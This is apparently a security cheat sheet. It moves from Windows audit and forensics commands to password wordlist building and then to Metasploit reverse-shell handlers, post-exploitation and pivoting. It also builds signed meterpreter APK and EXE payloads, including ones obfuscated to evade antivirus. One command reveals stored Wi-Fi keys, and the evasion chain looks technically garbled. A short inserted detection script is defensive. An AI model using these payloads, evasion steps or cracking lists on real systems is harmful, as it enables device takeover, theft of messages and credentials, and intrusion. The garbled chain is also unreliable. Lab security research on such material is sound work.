Get-EventLog -LogName Security -InstanceId 4625 -Newest 20
quser
Get-LocalUser
Reviews successful and failed logons, active user sessions, and local user accounts to detect brute-force or misuse.
Purpose: Audit IIS web server configuration and exposed services.
Import-Module WebAdministration
Get-Website
Get-WebBinding
Get-ChildItem IIS:\AppPools
netstat -ano | findstr :80
Enumerates IIS websites, bindings, application pools, and active web ports to find exposed or misconfigured services.
Purpose: Automate forensic log collection during incidents.
$path = "C:\IR\logs"
New-Item -ItemType Directory -Path $path -Force
Get-EventLog -LogName System -Newest 200 | Out-File "$path\system.log"
Get-EventLog -LogName Security -Newest 200 | Out-File "$path\security.log"
Get-Process | Out-File "$path\processes.txt"
Collects system logs and running processes into incident response folders for later forensic analysis.
Purpose: Analyze active network connections and open services on a device.
netstat -ano
netstat -anob
ipconfig /all
route print
Displays listening and established connections with process IDs and bound binaries. Useful for detecting suspicious outbound connections and rogue services.
Purpose: Audit Windows Firewall rules and exposed ports.
netsh advfirewall show allprofiles
netsh advfirewall firewall show rule name=all
netsh interface ipv4 show excludedportrange protocol=tcp
Enumerates firewall profiles, firewall rules, and reserved TCP port ranges to identify misconfigurations and unnecessary exposure.
Purpose: Inspect running processes and services for malicious binaries.
tasklist /v
tasklist /svc
sc query
wmic process list full
Maps processes to services and reveals execution paths to detect malware or suspicious binaries running on the system.
Purpose: Identify persistence mechanisms used by malware.
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
schtasks /query /fo LIST /v
dir "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
Enumerates autorun registry keys, scheduled tasks, and startup folders used by malware for persistence.
Purpose: Audit user privileges and active sessions.
whoami /all
query user
net user
net localgroup administrators
Reveals token privileges, logged-in users, local accounts, and administrator group membership.
Purpose: Identify exposed web services and map ports to processes.
netstat -ano | findstr :80
netstat -ano | findstr :443
tasklist /fi "PID eq <PID>"
sc query type= service
Detects web services running on HTTP/HTTPS ports and maps them to underlying processes and services.
Purpose: Collect forensic artifacts for investigation.
systeminfo
wevtutil qe Security /c:50 /f:text
dir C:\Windows\Temp
tree C:\ /f | more
Captures system info, recent security events, temp directory contents, and file structure for IR analysis.
Purpose: Generate detailed battery health and power reports.
powercfg /batteryreport
powercfg /energy
powercfg /sleepstudy
Generates HTML reports showing battery capacity degradation, power usage anomalies, and sleep state issues.
Purpose: Inspect saved Wi-Fi profiles and security configuration.
netsh wlan show profiles
netsh wlan show profile name="WiFi_Name" key=clear
netsh wlan show interfaces
netsh wlan show drivers
Lists saved Wi-Fi profiles, reveals stored keys (authorized audits only), shows live Wi-Fi interface status, and wireless driver capabilities.
Purpose: Validate disk health, drivers, and system file integrity.
chkdsk C: /scan
sfc /scannow
dism /online /cleanup-image /scanhealth
driverquery /v
Scans file system errors, verifies Windows system files, checks OS image health, and enumerates loaded drivers.
Purpose: Generate targeted wordlists using masks, patterns, and charsets.
# 8-12 length, lowercase + digits
crunch 8 12 abcdefghijklmnopqrstuvwxyz0123456789 -o wordlist.txt
# Pattern-based: 8 letters + a 20xx year (the -t mask is 12 chars, so min/max must be 12)
crunch 12 12 -t @@@@@@@@20%% -o pattern.txt
# Custom charset from list
crunch 6 6 -f /usr/share/crunch/charset.lst mixalpha-numeric-all -o mask.txt
Patterned masks drastically reduce search space and runtime.
Purpose: Crawl target content to build context-aware wordlists.
# Crawl site, depth 2, include emails
cewl https://target.com -d 2 -e -w cewl.txt
# Min word length 5, unique words only
cewl https://target.com -d 3 -m 5 -w custom.txt
Builds app-specific wordlists from public content (faster hits).
Purpose: Transform base lists into realistic variants (years, caps, symbols).
# Apply built-in rules to base wordlist
john --wordlist=base.txt --rules --stdout > mutated.txt
# Custom ruleset (example)
john --wordlist=names.txt --rules=KoreLogic --stdout > pro-mutations.txt
Rules emulate human password habits to boost success rate.
Purpose: Merge multiple lists, deduplicate, and optimize size.
# Merge lists
cat list1.txt list2.txt list3.txt > merged.txt
# Deduplicate + sort
sort -u merged.txt > final.txt
# Filter by length (8-20 chars)
awk 'length($0)>=8 && length($0)<=20' final.txt > filtered.txt
Smaller, curated lists = faster runs, higher signal-to-noise.
Purpose: Combine OSINT patterns with masks for precision lists.
# Example workflow
# 1) names.txt from OSINT
# 2) years.txt (1990-2026)
# 3) symbols.txt (!@#)
# Compose hybrid list: every name combined with every year, trailing "!"
# (paste would only pair line N of names.txt with line N of years.txt)
while read -r name; do
  while read -r year; do
    echo "${name}${year}!"
  done < years.txt
done < names.txt > hybrid.txt
Hybrid lists outperform generic megawordlists in real audits.
Purpose: Manage handlers, sessions, and post-exploitation for Android test devices.
msfconsole -q
# High-rank Android modules
search type:exploit platform:android rank:excellent
# Handler (Android callbacks)
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 10.10.10.5
set LPORT 4444
setg ExitOnSession false
exploit -j
# Session triage
sessions -l
sessions -i 1
# Android post modules (inventory / hygiene)
run post/android/gather/enum_applications
run post/android/gather/enum_sms
Parallel handlers + session triage + Android-specific post modules for authorized mobile labs.
Purpose: Operate sessions, post modules, and automation for Windows lab hosts.
msfconsole -q
# High-rank Windows modules
search type:exploit platform:windows rank:excellent
# Handler (Windows callbacks)
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.10.5
set LPORT 4444
setg ExitOnSession false
exploit -j
# Session triage
sessions -l
sessions -i 1
# Post modules (inventory / hygiene)
run post/windows/gather/enum_logged_on_users
run post/multi/recon/local_exploit_suggester
Parallel callbacks, session triage, and post-exploitation hygiene for Windows enterprise labs.
Purpose: Handle sessions, enumerate configs, and pivot inside Linux lab networks.
msfconsole -q
# High-rank Linux modules
search type:exploit platform:linux rank:excellent
# Handler (Linux callbacks)
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 10.10.10.5
set LPORT 4444
setg ExitOnSession false
exploit -j
# Session triage
sessions -l
sessions -i 1
# Linux post modules (configs / hygiene)
run post/linux/gather/enum_configs
# Pivot (lab segmentation)
route add 10.0.0.0/24 1
Linux-specific post modules + routing for segmented-network drills in authorized labs.
Purpose: Build Android test payloads for detection research in controlled labs.
# List Android payloads
msfvenom -l payloads | grep android
# Generate test APK (lab only)
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.5 LPORT=4444 -o lab-test.apk
# Sign APK for install in emulator / test phone
jarsigner -keystore debug.keystore lab-test.apk androiddebugkey
# Serve payload in lab
python3 -m http.server 8080
Blue-team angle: test EDR/AV detection on emulators (Android Studio / Genymotion). Measure alerts, signatures, and behavioral flags — document detections.
Purpose: Generate Windows lab payloads to study detections & EDR telemetry.
# List Windows payloads
msfvenom -l payloads | grep windows
# Build test EXE (lab only)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.5 LPORT=4444 -f exe -o lab-test.exe
# Inspect binary properties
file lab-test.exe
sha256sum lab-test.exe
# Drop in isolated VM and observe EDR alerts/logs
Blue-team angle: observe Defender/EDR alerts, AMSI hooks, process creation logs. Outcome: map which behaviors trigger detections (process injection, network callbacks).
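Added example (not part of the original cheat sheet): the "network callbacks" behavior above, expressed as detection logic. It correlates constructed Sysmon-style process-creation and network-connection events, and flags a process that dials out within a short window of being created when its image is unsigned or the destination is the lab handler port from the commands above (10.10.10.5:4444). The event shape and all sample values are assumptions for the demo.

```python
"""Flag freshly created processes that phone home (constructed lab telemetry)."""
from datetime import datetime

# Constructed sample events in a Sysmon-like shape; not real EDR output.
EVENTS = [
    {"ts": "2024-05-01T10:00:00", "type": "process_create", "pid": 4120,
     "image": r"C:\Users\lab\Downloads\lab-test.exe", "signed": False},
    {"ts": "2024-05-01T10:00:02", "type": "network_connect", "pid": 4120,
     "dst_ip": "10.10.10.5", "dst_port": 4444},
    # Benign: signed system binary talking HTTPS shortly after start.
    {"ts": "2024-05-01T10:03:00", "type": "process_create", "pid": 5000,
     "image": r"C:\Windows\System32\svchost.exe", "signed": True},
    {"ts": "2024-05-01T10:03:01", "type": "network_connect", "pid": 5000,
     "dst_ip": "10.10.10.5", "dst_port": 443},
    # Unsigned but long-running: outside the creation window, so not flagged.
    {"ts": "2024-05-01T09:00:00", "type": "process_create", "pid": 6000,
     "image": r"C:\Tools\unsigned-agent.exe", "signed": False},
    {"ts": "2024-05-01T10:05:00", "type": "network_connect", "pid": 6000,
     "dst_ip": "10.10.10.5", "dst_port": 8080},
]


def correlate(events, window_s=30, handler_ports=frozenset({4444})):
    """Return one alert per process whose first outbound connection
    happens within window_s seconds of creation and is either from an
    unsigned image or to a known lab handler port."""
    created = {}   # pid -> (creation time, image path, signed flag)
    alerted = set()
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        if ev["type"] == "process_create":
            created[ev["pid"]] = (ts, ev["image"], ev["signed"])
            continue
        if ev["type"] != "network_connect" or ev["pid"] not in created:
            continue
        c_ts, image, signed = created[ev["pid"]]
        age = (ts - c_ts).total_seconds()
        reasons = []
        if not signed:
            reasons.append("unsigned image")
        if ev["dst_port"] in handler_ports:
            reasons.append("known handler port %d" % ev["dst_port"])
        if reasons and age <= window_s and ev["pid"] not in alerted:
            alerted.add(ev["pid"])
            alerts.append({"pid": ev["pid"], "image": image, "age_s": age,
                           "dst": "%s:%d" % (ev["dst_ip"], ev["dst_port"]),
                           "reasons": reasons})
    return alerts
```

Running `correlate(EVENTS)` reports only pid 4120; tune `window_s` and `handler_ports` against the telemetry your EDR actually emits.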
Purpose: Generate obfuscated Android APK payloads to bypass mobile EDR/AV detections.
# List Android payloads
msfvenom -l payloads | grep android
# Basic APK payload (easily detected)
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.5 LPORT=4444 R > basic.apk
# Stealth APK with custom template + encoding (lab evasion)
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.5 LPORT=4444 \
  -e generic/none -i 5 --platform android \
  -x /usr/share/metasploit-framework/data/templates/src/post/android.apk \
  -o stealth-lab.apk
# Advanced obfuscation chain (Pro evasion)
msfvenom -p android/shell/reverse_tcp LHOST=10.10.10.5 LPORT=4444 \
  -f raw -e x86/shikata_ga_nai -i 8 | \
  msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.5 LPORT=4444 \
  -e generic/none --platform android -a x86 -f apk -o evasive.apk
# Verify & sign APK
keytool -genkey -v -keystore lab.keystore -alias lab -keyalg RSA -keysize 2048 -validity 10000
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore lab.keystore evasive.apk lab
Blue-team angle: Test on rooted Android emulator with Mobile Security Framework (MobSF). Monitor dex bytecode patterns, network C2, and Frida traces for evasion techniques.